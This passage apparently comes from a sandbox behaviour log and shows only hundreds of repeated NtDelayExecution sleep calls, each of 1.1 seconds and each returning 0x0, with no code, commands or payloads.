(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.774] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.783] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.784] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.786] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.787] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.794] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.795] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.797] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.798] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.804] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.806] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.809] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.814] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.815] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.823] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.825] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.826] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.828] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.831] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.832] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.834] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.835] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.837] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.838] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.846] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.849] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.851] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.853] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.854] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.861] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.863] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.864] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.866] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.867] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.868] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.870] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.880] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.882] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.883] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.885] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.886] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.893] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.894] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.896] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.897] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.899] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.900] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.903] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.904] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.906] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.908] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.909] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.911] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.915] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.917] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.922] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.925] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.926] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.928] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.929] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.930] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.932] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.934] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.935] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.936] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.938] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.940] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.941] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.943] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.944] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.946] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.947] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.952] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.954] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.958] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.960] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.961] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.963] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.964] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.966] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.967] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.970] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.972] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.974] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.976] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.984] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.989] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.991] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.993] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.995] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.997] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0143.998] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.000] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.077] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.091] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.092] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.093] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.095] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.102] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.104] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.105] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.107] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.108] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.118] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.119] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.121] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.122] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.129] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.131] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.132] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.134] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.141] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.142] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.144] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.145] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.152] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.158] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.159] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.161] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.168] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.170] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.171] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.173] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.179] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.181] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.182] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.190] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.191] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.193] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.202] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.203] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.205] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.206] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.213] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.214] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.216] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.230] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.232] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.233] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.236] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.245] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.247] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.248] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.250] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.256] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.258] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.259] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.267] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.269] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.270] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.272] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.285] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.287] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.288] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.290] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.291] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.293] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.294] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.296] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.297] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.299] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.301] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.303] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.304] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.306] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.307] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.309] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.310] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.313] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.314] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.316] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.318] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.323] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.324] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.325] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.327] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.329] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.331] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.332] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.334] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.336] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.337] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.339] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.341] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.386] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.388] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.389] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.391] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.399] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.400] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.402] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.403] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.411] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.413] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.414] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.421] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.424] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.426] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.427] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.433] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.435] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.437] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.440] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.447] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.448] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.450] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.451] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.459] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.461] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.462] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.470] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.472] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.473] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.477] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.483] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.484] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.488] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.489] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.491] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.497] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.499] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.500] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.502] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.509] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.510] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.512] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.515] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.521] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.523] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.525] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.532] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.536] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.538] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.539] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.541] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.547] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.548] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.550] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.551] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.561] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.562] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.564] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.565] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.571] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.573] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.574] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.575] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.578] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.581] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.582] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.584] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.585] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.632] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.633] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.635] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.636] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.638] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.640] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.646] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.648] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.649] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.651] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.659] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.660] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.662] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.663] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.669] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.671] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.673] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.674] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.718] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.719] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.721] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.722] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.724] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.725] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.727] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.728] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.730] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.731] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.733] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.734] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.736] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.738] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.739] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.741] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.742] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.744] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.749] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.750] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.752] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.753] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.755] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.756] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.758] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.759] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.762] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.763] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.765] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.766] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.768] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.769] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.771] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.772] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.774] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.778] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.780] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.781] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.783] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.784] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.786] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.787] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.789] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.790] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.792] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.793] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.795] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.796] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.798] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.799] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.801] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.803] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.804] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.806] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.810] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0144.812] NtDelayExecution 